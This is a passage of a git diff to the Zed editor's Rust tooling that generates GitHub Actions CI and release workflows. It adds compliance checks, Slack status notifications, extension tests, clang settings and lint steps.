}}", + )) + } + + named::job( + Job::default() + .add_env(("COMPLIANCE_FILE_PATH", "compliance.md")) + .with_repository_owner_guard() + .runs_on(runners::LINUX_DEFAULT) + .add_step( + steps::checkout_repo() + .with_full_history() + .with_ref(Context::github().ref_()), + ) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(run_compliance_check()) + .add_step(send_compliance_slack_notification()), + ) +} + fn validate_release_assets(deps: &[&NamedJob]) -> NamedJob { let expected_assets: Vec = assets::all().iter().map(|a| format!("\"{a}\"")).collect(); let expected_assets_json = format!("[{}]", expected_assets.join(", ")); @@ -171,15 +228,59 @@ fn validate_release_assets(deps: &[&NamedJob]) -> NamedJob { "#, }; + fn run_post_upload_compliance_check() -> Step { + named::bash( + r#"cargo xtask compliance "$GITHUB_REF_NAME" --report-path target/compliance-report"#, + ) + .id("run-post-upload-compliance-check") + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_post_upload_compliance_notification() -> Step { + named::bash(indoc::indoc! {r#" + if [ -z "$COMPLIANCE_OUTCOME" ] || [ "$COMPLIANCE_OUTCOME" == "skipped" ]; then + echo "Compliance check was skipped, not sending notification" + exit 0 + fi + + TAG="$GITHUB_REF_NAME" + + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + MESSAGE="✅ Post-upload compliance re-check passed for $TAG" + else + MESSAGE="❌ Post-upload compliance re-check failed for $TAG" + fi + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("always()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(( + "COMPLIANCE_OUTCOME", + "${{ steps.run-post-upload-compliance-check.outcome }}", + )) + } + named::job( - dependant_job(deps).runs_on(runners::LINUX_SMALL).add_step( - named::bash(&validation_script).add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)), - ), + dependant_job(deps) + .runs_on(runners::LINUX_SMALL) + .add_step(named::bash(&validation_script).add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN))) + .add_step( + steps::checkout_repo() + .with_full_history() + .with_ref(Context::github().ref_()), + ) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(run_post_upload_compliance_check()) + .add_step(send_post_upload_compliance_notification()), ) } fn auto_release_preview(deps: &[&NamedJob]) -> NamedJob { - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy().into(); named::job( dependant_job(deps) @@ -255,7 +356,7 @@ fn create_draft_release() -> NamedJob { .add_step( steps::checkout_repo() .with_custom_fetch_depth(25) - .with_ref("${{ github.ref }}"), + .with_ref(Context::github().ref_()), ) .add_step(steps::script("script/determine-release-channel")) .add_step(steps::script("mkdir -p target/")) @@ -272,18 +373,55 @@ pub(crate) fn push_release_update_notification( test_jobs: &[&NamedJob], bundle_jobs: &ReleaseBundleJobs, ) -> NamedJob { - let all_job_names = test_jobs - .into_iter() + fn env_name(name: &str) -> String { + format!("RESULT_{}", name.to_uppercase()) + } + + let all_job_names: Vec<&str> = test_jobs + .iter() .map(|j| j.name.as_ref()) - .chain(bundle_jobs.jobs().into_iter().map(|j| j.name.as_ref())); + .chain(bundle_jobs.jobs().into_iter().map(|j| j.name.as_ref())) + .collect(); + + let env_entries = [ + ( + "DRAFT_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", create_draft_release_job.name), + ), + ( + "UPLOAD_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", upload_assets_job.name), + ), + ( + "VALIDATE_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", validate_assets_job.name), + ), + ( + "AUTO_RELEASE_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", auto_release_preview.name), + ), + ("RUN_URL".into(), CURRENT_ACTION_RUN_URL.to_string()), + ] + .into_iter() + .chain( + all_job_names + .iter() + .map(|name| (env_name(name), format!("${{{{ needs.{name}.result }}}}"))), + ); + + let failure_checks = all_job_names + .iter() + .map(|name| { + format!( + "if [ \"${env_name}\" == \"failure\" ];then FAILED_JOBS=\"$FAILED_JOBS {name}\"; fi", + env_name = env_name(name) + ) + }) + .collect::>() + .join("\n "); let notification_script = formatdoc! {r#" - DRAFT_RESULT="${{{{ needs.{draft_job}.result }}}}" - UPLOAD_RESULT="${{{{ needs.{upload_job}.result }}}}" - VALIDATE_RESULT="${{{{ needs.{validate_job}.result }}}}" - AUTO_RELEASE_RESULT="${{{{ needs.{auto_release_job}.result }}}}" TAG="$GITHUB_REF_NAME" - RUN_URL="{run_url}" if [ "$DRAFT_RESULT" == "failure" ]; then echo "❌ Draft release creation failed for $TAG: $RUN_URL" @@ -319,19 +457,6 @@ pub(crate) fn push_release_update_notification( fi fi "#, - draft_job = create_draft_release_job.name, - upload_job = upload_assets_job.name, - validate_job = validate_assets_job.name, - auto_release_job = auto_release_preview.name, - run_url = CURRENT_ACTION_RUN_URL, - failure_checks = all_job_names - .into_iter() - .map(|name: &str| format!( - "if [ \"${{{{ needs.{name}.result }}}}\" == \"failure\" ];\ - then FAILED_JOBS=\"$FAILED_JOBS {name}\"; fi" - )) - .collect::>() - .join("\n "), }; let mut all_deps: Vec<&NamedJob> = vec![ @@ -347,7 +472,10 @@ pub(crate) fn push_release_update_notification( .runs_on(runners::LINUX_SMALL) .cond(Expression::new("always()")); - for step in notify_slack(MessageType::Evaluated(notification_script)) { + for step in notify_slack(MessageType::Evaluated { + script: notification_script, + env: env_entries.collect(), + }) { job = job.add_step(step); } named::job(job) @@ -368,14 +496,17 @@ pub(crate) fn notify_on_failure(deps: &[&NamedJob]) -> NamedJob { pub(crate) enum MessageType { Static(String), - Evaluated(String), + Evaluated { + script: String, + env: Vec<(String, String)>, + }, } fn notify_slack(message: MessageType) -> Vec> { match message { MessageType::Static(message) => vec![send_slack_message(message)], - MessageType::Evaluated(expression) => { - let (generate_step, generated_message) = generate_slack_message(expression); + MessageType::Evaluated { script, env } => { + let (generate_step, generated_message) = generate_slack_message(script, env); vec![ generate_step, @@ -385,26 +516,32 @@ fn notify_slack(message: MessageType) -> Vec> { } } -fn generate_slack_message(expression: String) -> (Step, StepOutput) { +fn generate_slack_message( + expression: String, + env: Vec<(String, String)>, +) -> (Step, StepOutput) { let script = formatdoc! {r#" MESSAGE=$({expression}) echo "message=$MESSAGE" >> "$GITHUB_OUTPUT" "# }; - let generate_step = named::bash(&script) + let mut generate_step = named::bash(&script) .id("generate-webhook-message") .add_env(("GH_TOKEN", Context::github().token())); + for (name, value) in env { + generate_step = generate_step.add_env((name, value)); + } + let output = StepOutput::new(&generate_step, "message"); (generate_step, output) } fn send_slack_message(message: String) -> Step { - let script = formatdoc! {r#" - curl -X POST -H 'Content-type: application/json'\ - --data '{{"text":"{message}"}}' "$SLACK_WEBHOOK" - "# - }; - named::bash(&script).add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + named::bash( + r#"curl -X POST -H 'Content-type: application/json' --data "$(jq -n --arg text "$SLACK_MESSAGE" '{"text": $text}')" "$SLACK_WEBHOOK""# + ) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(("SLACK_MESSAGE", message)) } diff --git a/tooling/xtask/src/tasks/workflows/release_nightly.rs b/tooling/xtask/src/tasks/workflows/release_nightly.rs index bcae94d08d14a76bef82482c1afd707c5a8a4bda..277db38bee6ebe24482d6c91f6bb8966bed9d1d3 100644 --- a/tooling/xtask/src/tasks/workflows/release_nightly.rs +++ b/tooling/xtask/src/tasks/workflows/release_nightly.rs @@ -18,7 +18,7 @@ pub fn release_nightly() -> Workflow { let style = check_style(); // run only on windows as that's our fastest platform right now. let tests = run_platform_tests_no_filter(Platform::Windows); - let clippy_job = clippy(Platform::Windows); + let clippy_job = clippy(Platform::Windows, None); let nightly = Some(ReleaseChannel::Nightly); let bundle = ReleaseBundleJobs { diff --git a/tooling/xtask/src/tasks/workflows/run_agent_evals.rs b/tooling/xtask/src/tasks/workflows/run_agent_evals.rs index e83d3a07f079c1f40360f413f3007813dbe552ce..8146552e6567fc336be91e3ad6c0687c441b6604 100644 --- a/tooling/xtask/src/tasks/workflows/run_agent_evals.rs +++ b/tooling/xtask/src/tasks/workflows/run_agent_evals.rs @@ -3,32 +3,10 @@ use serde_json::json; use crate::tasks::workflows::{ runners::{self, Platform}, - steps::{self, FluentBuilder as _, NamedJob, named, setup_cargo_config}, + steps::{self, FluentBuilder as _, NamedJob, named}, vars::{self, WorkflowInput}, }; -pub(crate) fn run_agent_evals() -> Workflow { - let agent_evals = agent_evals(); - let model_name = WorkflowInput::string("model_name", None); - - named::workflow() - .on(Event::default().workflow_dispatch( - WorkflowDispatch::default().add_input(model_name.name, model_name.input()), - )) - .concurrency(vars::one_workflow_per_non_main_branch()) - .add_env(("CARGO_TERM_COLOR", "always")) - .add_env(("CARGO_INCREMENTAL", 0)) - .add_env(("RUST_BACKTRACE", 1)) - .add_env(("ANTHROPIC_API_KEY", vars::ANTHROPIC_API_KEY)) - .add_env(("OPENAI_API_KEY", vars::OPENAI_API_KEY)) - .add_env(("GOOGLE_AI_API_KEY", vars::GOOGLE_AI_API_KEY)) - .add_env(("GOOGLE_CLOUD_PROJECT", vars::GOOGLE_CLOUD_PROJECT)) - .add_env(("ZED_CLIENT_CHECKSUM_SEED", vars::ZED_CLIENT_CHECKSUM_SEED)) - .add_env(("ZED_EVAL_TELEMETRY", 1)) - .add_env(("MODEL_NAME", model_name.to_string())) - .add_job(agent_evals.name, agent_evals.job) -} - pub(crate) fn run_unit_evals() -> Workflow { let model_name = WorkflowInput::string("model_name", None); let commit_sha = WorkflowInput::string("commit_sha", None); @@ -59,29 +37,6 @@ fn add_api_keys(step: Step) -> Step { .add_env(("GOOGLE_CLOUD_PROJECT", vars::GOOGLE_CLOUD_PROJECT)) } -fn agent_evals() -> NamedJob { - fn run_eval() -> Step { - named::bash( - "cargo run --package=eval -- --repetitions=8 --concurrency=1 --model \"${MODEL_NAME}\"", - ) - } - - named::job( - Job::default() - .runs_on(runners::LINUX_DEFAULT) - .timeout_minutes(60_u32 * 10) - .add_step(steps::checkout_repo()) - .add_step(steps::cache_rust_dependencies_namespace()) - .map(steps::install_linux_dependencies) - .add_step(setup_cargo_config(Platform::Linux)) - .add_step(steps::setup_sccache(Platform::Linux)) - .add_step(steps::script("cargo build --package=eval")) - .add_step(add_api_keys(run_eval())) - .add_step(steps::show_sccache_stats(Platform::Linux)) - .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) -} - pub(crate) fn run_cron_unit_evals() -> Workflow { let unit_evals = cron_unit_evals(); @@ -123,7 +78,7 @@ fn cron_unit_evals() -> NamedJob { const UNIT_EVAL_MODELS: &[&str] = &[ "anthropic/claude-sonnet-4-5-latest", "anthropic/claude-opus-4-5-latest", - "google/gemini-3-pro", + "google/gemini-3.1-pro", "openai/gpt-5", ]; diff --git a/tooling/xtask/src/tasks/workflows/run_bundling.rs b/tooling/xtask/src/tasks/workflows/run_bundling.rs index 7fa82e80c52b9e6faec6a377d906269e7a3dbb77..6b9d3b9e36c3ba3b3de4b02a53e83ee4faaa4785 100644 --- a/tooling/xtask/src/tasks/workflows/run_bundling.rs +++ b/tooling/xtask/src/tasks/workflows/run_bundling.rs @@ -146,6 +146,8 @@ pub(crate) fn bundle_linux( job: bundle_job(deps) .runs_on(arch.linux_bundler()) .envs(bundle_envs(platform)) + .add_env(Env::new("CC", "clang-18")) + .add_env(Env::new("CXX", "clang++-18")) .add_step(steps::checkout_repo()) .when_some(release_channel, |job, release_channel| { job.add_step(set_release_channel(platform, release_channel)) diff --git a/tooling/xtask/src/tasks/workflows/run_tests.rs b/tooling/xtask/src/tasks/workflows/run_tests.rs index 8b633edab6d81ad71c31e25c5171af076402fa9d..65b44123c7b76f49e7c349318aab1bc2fb856c1f 100644 --- a/tooling/xtask/src/tasks/workflows/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/run_tests.rs @@ -1,16 +1,21 @@ use gh_workflow::{ - Concurrency, Container, Event, Expression, Job, Port, PullRequest, Push, Run, Step, Use, - Workflow, + Concurrency, Container, Event, Expression, Input, Job, Level, Permissions, Port, PullRequest, + Push, Run, Step, Strategy, Use, UsesJob, Workflow, }; use indexmap::IndexMap; +use indoc::formatdoc; +use serde_json::json; use crate::tasks::workflows::{ - steps::{CommonJobConditions, repository_owner_guard_expression}, + steps::{ + CommonJobConditions, cache_rust_dependencies_namespace, repository_owner_guard_expression, + use_clang, + }, vars::{self, PathCondition}, }; use super::{ - runners::{self, Platform}, + runners::{self, Arch, Platform}, steps::{self, FluentBuilder, NamedJob, named, release_job}, }; @@ -20,9 +25,10 @@ pub(crate) fn run_tests() -> Workflow { // - script/update_top_ranking_issues/ // - .github/ISSUE_TEMPLATE/ // - .github/workflows/ (except .github/workflows/ci.yml) + // - extensions/ (these have their own test workflow) let should_run_tests = PathCondition::inverted( "run_tests", - r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))", + r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)", ); let should_check_docs = PathCondition::new("run_docs", r"^(docs/|crates/.*\.rs)"); let should_check_scripts = PathCondition::new( @@ -42,9 +48,10 @@ pub(crate) fn run_tests() -> Workflow { let mut jobs = vec![ orchestrate, check_style(), - should_run_tests.guard(clippy(Platform::Windows)), - should_run_tests.guard(clippy(Platform::Linux)), - should_run_tests.guard(clippy(Platform::Mac)), + should_run_tests.guard(clippy(Platform::Windows, None)), + should_run_tests.guard(clippy(Platform::Linux, None)), + should_run_tests.guard(clippy(Platform::Mac, None)), + should_run_tests.guard(clippy(Platform::Mac, Some(Arch::X86_64))), should_run_tests.guard(run_platform_tests(Platform::Windows)), should_run_tests.guard(run_platform_tests(Platform::Linux)), should_run_tests.guard(run_platform_tests(Platform::Mac)), @@ -56,7 +63,8 @@ pub(crate) fn run_tests() -> Workflow { should_check_licences.guard(check_licenses()), should_check_scripts.guard(check_scripts()), ]; - let tests_pass = tests_pass(&jobs); + let ext_tests = extension_tests(); + let tests_pass = tests_pass(&jobs, &[&ext_tests.name]); jobs.push(should_run_tests.guard(check_postgres_and_protobuf_migrations())); // could be more specific here? @@ -87,20 +95,32 @@ pub(crate) fn run_tests() -> Workflow { } workflow }) + .add_job(ext_tests.name, ext_tests.job) .add_job(tests_pass.name, tests_pass.job) } +/// Controls which features `orchestrate_impl` includes in the generated script. +#[derive(PartialEq, Eq)] +enum OrchestrateTarget { + /// For the main Zed repo: includes the cargo package filter and extension + /// change detection, but no working-directory scoping. + ZedRepo, + /// For individual extension repos: scopes changed-file detection to the + /// working directory, with no package filter or extension detection. + Extension, +} + // Generates a bash script that checks changed files against regex patterns // and sets GitHub output variables accordingly pub fn orchestrate(rules: &[&PathCondition]) -> NamedJob { - orchestrate_impl(rules, true) + orchestrate_impl(rules, OrchestrateTarget::ZedRepo) } -pub fn orchestrate_without_package_filter(rules: &[&PathCondition]) -> NamedJob { - orchestrate_impl(rules, false) +pub fn orchestrate_for_extension(rules: &[&PathCondition]) -> NamedJob { + orchestrate_impl(rules, OrchestrateTarget::Extension) } -fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> NamedJob { +fn orchestrate_impl(rules: &[&PathCondition], target: OrchestrateTarget) -> NamedJob { let name = "orchestrate".to_owned(); let step_name = "filter".to_owned(); let mut script = String::new(); @@ -115,8 +135,24 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + + "#}); + + if target == OrchestrateTarget::Extension { + script.push_str(indoc::indoc! {r#" + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi + + "#}); + } + script.push_str(indoc::indoc! {r#" check_pattern() { local output_name="$1" local pattern="$2" @@ -131,7 +167,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N let mut outputs = IndexMap::new(); - if include_package_filter { + if target == OrchestrateTarget::ZedRepo { script.push_str(indoc::indoc! {r#" # Check for changes that require full rebuild (no filter) # Direct pushes to main/stable/preview always run full suite @@ -217,6 +253,16 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N )); } + if target == OrchestrateTarget::ZedRepo { + script.push_str(DETECT_CHANGED_EXTENSIONS_SCRIPT); + script.push_str("echo \"changed_extensions=$EXTENSIONS_JSON\" >> \"$GITHUB_OUTPUT\"\n"); + + outputs.insert( + "changed_extensions".to_owned(), + format!("${{{{ steps.{}.outputs.changed_extensions }}}}", step_name), + ); + } + let job = Job::default() .runs_on(runners::LINUX_SMALL) .with_repository_owner_guard() @@ -227,7 +273,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N NamedJob { name, job } } -pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { +pub fn tests_pass(jobs: &[NamedJob], extra_job_names: &[&str]) -> NamedJob { let mut script = String::from(indoc::indoc! {r#" set +x EXIT_CODE=0 @@ -239,15 +285,26 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { "#}); + let all_names: Vec<&str> = jobs + .iter() + .map(|job| job.name.as_str()) + .chain(extra_job_names.iter().copied()) + .collect(); + + let env_entries: Vec<_> = all_names + .iter() + .map(|name| { + let env_name = format!("RESULT_{}", name.to_uppercase()); + let env_value = format!("${{{{ needs.{}.result }}}}", name); + (env_name, env_value) + }) + .collect(); + script.push_str( - &jobs + &all_names .iter() - .map(|job| { - format!( - "check_result \"{}\" \"${{{{ needs.{}.result }}}}\"", - job.name, job.name - ) - }) + .zip(env_entries.iter()) + .map(|(name, (env_name, _))| format!("check_result \"{}\" \"${}\"", name, env_name)) .collect::>() .join("\n"), ); @@ -257,16 +314,70 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { let job = Job::default() .runs_on(runners::LINUX_SMALL) .needs( - jobs.iter() - .map(|j| j.name.to_string()) + all_names + .iter() + .map(|name| name.to_string()) .collect::>(), ) .cond(repository_owner_guard_expression(true)) - .add_step(named::bash(&script)); + .add_step( + env_entries + .into_iter() + .fold(named::bash(&script), |step, env_item| { + step.add_env(env_item) + }), + ); named::job(job) } +/// Bash script snippet that detects changed extension directories from `$CHANGED_FILES`. +/// Assumes `$CHANGED_FILES` is already set. Sets `$EXTENSIONS_JSON` to a JSON array of +/// changed extension paths. Callers are responsible for writing the result to `$GITHUB_OUTPUT`. +pub(crate) const DETECT_CHANGED_EXTENSIONS_SCRIPT: &str = indoc::indoc! {r#" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi +"#}; + +const TS_QUERY_LS_FILE: &str = "ts_query_ls-x86_64-unknown-linux-gnu.tar.gz"; +const CI_TS_QUERY_RELEASE: &str = "tags/v3.15.1"; + +pub(crate) fn fetch_ts_query_ls() -> Step { + named::uses( + "dsaltares", + "fetch-gh-release-asset", + "aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c", + ) // v1.1.1 + .add_with(("repo", "ribru17/ts_query_ls")) + .add_with(("version", CI_TS_QUERY_RELEASE)) + .add_with(("file", TS_QUERY_LS_FILE)) +} + +pub(crate) fn run_ts_query_ls() -> Step { + named::bash(formatdoc!( + r#"tar -xf "$GITHUB_WORKSPACE/{TS_QUERY_LS_FILE}" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {{ + echo "Found unformatted queries, please format them with ts_query_ls." + echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + }}"# + )) +} + fn check_style() -> NamedJob { fn check_for_typos() -> Step { named::uses( @@ -276,6 +387,7 @@ fn check_style() -> NamedJob { ) // v1.40.0 .with(("config", "./typos.toml")) } + named::job( release_job(&[]) .runs_on(runners::LINUX_MEDIUM) @@ -286,7 +398,9 @@ fn check_style() -> NamedJob { .add_step(steps::cargo_fmt()) .add_step(steps::script("./script/check-todos")) .add_step(steps::script("./script/check-keymaps")) - .add_step(check_for_typos()), + .add_step(check_for_typos()) + .add_step(fetch_ts_query_ls()) + .add_step(run_ts_query_ls()), ) } @@ -324,7 +438,7 @@ fn check_dependencies() -> NamedJob { .with(("license-check", false)) } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_SMALL) .add_step(steps::checkout_repo()) @@ -333,7 +447,7 @@ fn check_dependencies() -> NamedJob { .add_step(run_cargo_machete()) .add_step(check_cargo_lock()) .add_step(check_vulnerable_dependencies()), - ) + )) } fn check_wasm() -> NamedJob { @@ -369,7 +483,7 @@ fn check_wasm() -> NamedJob { } fn check_workspace_binaries() -> NamedJob { - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_LARGE) .add_step(steps::checkout_repo()) @@ -381,33 +495,46 @@ fn check_workspace_binaries() -> NamedJob { .add_step(steps::script("cargo build --workspace --bins --examples")) .add_step(steps::show_sccache_stats(Platform::Linux)) .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) + )) } -pub(crate) fn clippy(platform: Platform) -> NamedJob { +pub(crate) fn clippy(platform: Platform, arch: Option) -> NamedJob { + let target = arch.map(|arch| match (platform, arch) { + (Platform::Mac, Arch::X86_64) => "x86_64-apple-darwin", + (Platform::Mac, Arch::AARCH64) => "aarch64-apple-darwin", + _ => unimplemented!("cross-arch clippy not supported for {platform}/{arch}"), + }); let runner = match platform { Platform::Windows => runners::WINDOWS_DEFAULT, Platform::Linux => runners::LINUX_DEFAULT, Platform::Mac => runners::MAC_DEFAULT, }; - NamedJob { - name: format!("clippy_{platform}"), - job: release_job(&[]) - .runs_on(runner) - .add_step(steps::checkout_repo()) - .add_step(steps::setup_cargo_config(platform)) - .when( - platform == Platform::Linux || platform == Platform::Mac, - |this| this.add_step(steps::cache_rust_dependencies_namespace()), - ) - .when( - platform == Platform::Linux, - steps::install_linux_dependencies, - ) - .add_step(steps::setup_sccache(platform)) - .add_step(steps::clippy(platform)) - .add_step(steps::show_sccache_stats(platform)), + let mut job = release_job(&[]) + .runs_on(runner) + .add_step(steps::checkout_repo()) + .add_step(steps::setup_cargo_config(platform)) + .when( + platform == Platform::Linux || platform == Platform::Mac, + |this| this.add_step(steps::cache_rust_dependencies_namespace()), + ) + .when( + platform == Platform::Linux, + steps::install_linux_dependencies, + ) + .when_some(target, |this, target| { + this.add_step(steps::install_rustup_target(target)) + }) + .add_step(steps::setup_sccache(platform)) + .add_step(steps::clippy(platform, target)) + .add_step(steps::show_sccache_stats(platform)); + if platform == Platform::Linux { + job = use_clang(job); } + let name = match arch { + Some(arch) => format!("clippy_{platform}_{arch}"), + None => format!("clippy_{platform}"), + }; + NamedJob { name, job } } pub(crate) fn run_platform_tests(platform: Platform) -> NamedJob { @@ -444,10 +571,12 @@ fn run_platform_tests_impl(platform: Platform, filter_packages: bool) -> NamedJo }) .add_step(steps::checkout_repo()) .add_step(steps::setup_cargo_config(platform)) - .when( - platform == Platform::Linux || platform == Platform::Mac, - |this| this.add_step(steps::cache_rust_dependencies_namespace()), - ) + .when(platform == Platform::Mac, |this| { + this.add_step(steps::cache_rust_dependencies_namespace()) + }) + .when(platform == Platform::Linux, |this| { + use_clang(this.add_step(steps::cache_rust_dependencies_namespace())) + }) .when( platform == Platform::Linux, steps::install_linux_dependencies, @@ -467,6 +596,9 @@ fn run_platform_tests_impl(platform: Platform, filter_packages: bool) -> NamedJo .when(!filter_packages, |job| { job.add_step(steps::cargo_nextest(platform)) }) + .when(platform == Platform::Mac, |job| { + job.add_step(steps::cargo_build_visual_tests()) + }) .add_step(steps::show_sccache_stats(platform)) .add_step(steps::cleanup_cargo_config(platform)), } @@ -497,6 +629,14 @@ pub(crate) fn check_postgres_and_protobuf_migrations() -> NamedJob { .add_with(("against", "https://github.com/${GITHUB_REPOSITORY}.git#branch=${BUF_BASE_BRANCH},subdir=crates/proto/proto/")) } + fn buf_lint() -> Step { + named::bash("buf lint crates/proto/proto") + } + + fn check_protobuf_formatting() -> Step { + named::bash("buf format --diff --exit-code crates/proto/proto") + } + named::job( release_job(&[]) .runs_on(runners::LINUX_DEFAULT) @@ -507,7 +647,9 @@ pub(crate) fn check_postgres_and_protobuf_migrations() -> NamedJob { .add_step(steps::checkout_repo().with_full_history()) .add_step(ensure_fresh_merge()) .add_step(bufbuild_setup_action()) - .add_step(bufbuild_breaking_action()), + .add_step(bufbuild_breaking_action()) + .add_step(buf_lint()) + .add_step(check_protobuf_formatting()), ) } @@ -519,7 +661,7 @@ fn doctests() -> NamedJob { .id("run_doctests") } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_DEFAULT) .add_step(steps::checkout_repo()) @@ -530,7 +672,7 @@ fn doctests() -> NamedJob { .add_step(run_doctests()) .add_step(steps::show_sccache_stats(Platform::Linux)) .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) + )) } fn check_licenses() -> NamedJob { @@ -572,7 +714,7 @@ fn check_docs() -> NamedJob { "#}) } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_LARGE) .add_step(steps::checkout_repo()) @@ -589,7 +731,7 @@ fn check_docs() -> NamedJob { .add_step( lychee_link_check("target/deploy/docs"), // check links in generated html ), - ) + )) } pub(crate) fn check_scripts() -> NamedJob { @@ -600,9 +742,10 @@ pub(crate) fn check_scripts() -> NamedJob { } fn run_actionlint() -> Step { - named::bash(indoc::indoc! {r#" - ${{ steps.get_actionlint.outputs.executable }} -color - "#}) + named::bash(r#""$ACTIONLINT_BIN" -color"#).add_env(( + "ACTIONLINT_BIN", + "${{ steps.get_actionlint.outputs.executable }}", + )) } fn run_shellcheck() -> Step { @@ -627,6 +770,30 @@ pub(crate) fn check_scripts() -> NamedJob { .add_step(run_shellcheck()) .add_step(download_actionlint().id("get_actionlint")) .add_step(run_actionlint()) + .add_step(cache_rust_dependencies_namespace()) .add_step(check_xtask_workflows()), ) } + +fn extension_tests() -> NamedJob { + let job = Job::default() + .needs(vec!["orchestrate".to_owned()]) + .cond(Expression::new( + "needs.orchestrate.outputs.changed_extensions != '[]'", + )) + .permissions(Permissions::default().contents(Level::Read)) + .strategy( + Strategy::default() + .fail_fast(false) + // TODO: Remove the limit. We currently need this to workaround the concurrency group issue + // where different matrix jobs would be placed in the same concurrency group and thus cancelled. + .max_parallel(1u32) + .matrix(json!({ + "extension": "${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}" + })), + ) + .uses_local(".github/workflows/extension_tests.yml") + .with(Input::default().add("working-directory", "${{ matrix.extension }}")); + + named::job(job) +} diff --git a/tooling/xtask/src/tasks/workflows/steps.rs b/tooling/xtask/src/tasks/workflows/steps.rs index 8220d8311ff7ee0ee3a955dabacb067701bb8d51..15c2614ada81dd7c2e772f52c7072dac4324d1dc 100644 --- a/tooling/xtask/src/tasks/workflows/steps.rs +++ b/tooling/xtask/src/tasks/workflows/steps.rs @@ -1,11 +1,20 @@ use gh_workflow::*; use serde_json::Value; -use crate::tasks::workflows::{runners::Platform, vars, vars::StepOutput}; +use crate::tasks::workflows::{ + runners::Platform, + steps::named::function_name, + vars::{self, StepOutput}, +}; + +pub(crate) fn use_clang(job: Job) -> Job { + job.add_env(Env::new("CC", "clang")) + .add_env(Env::new("CXX", "clang++")) +} const SCCACHE_R2_BUCKET: &str = "sccache-zed"; -const BASH_SHELL: &str = "bash -euxo pipefail {0}"; +pub(crate) const BASH_SHELL: &str = "bash -euxo pipefail {0}"; // https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#jobsjob_idstepsshell pub const PWSH_SHELL: &str = "pwsh"; @@ -19,13 +28,6 @@ pub(crate) fn cargo_nextest(platform: Platform) -> Nextest { } impl Nextest { - pub(crate) fn with_target(mut self, target: &str) -> Step { - if let Some(nextest_command) = self.0.value.run.as_mut() { - nextest_command.push_str(&format!(r#" --target "{target}""#)); - } - self.into() - } - #[allow(dead_code)] pub(crate) fn with_filter_expr(mut self, filter_expr: &str) -> Self { if let Some(nextest_command) = self.0.value.run.as_mut() { @@ -116,7 +118,7 @@ impl From for Step { .uses( "actions", "checkout", - "11bd71901bbe5b1630ceea73d27597364c9af683", // v4 + 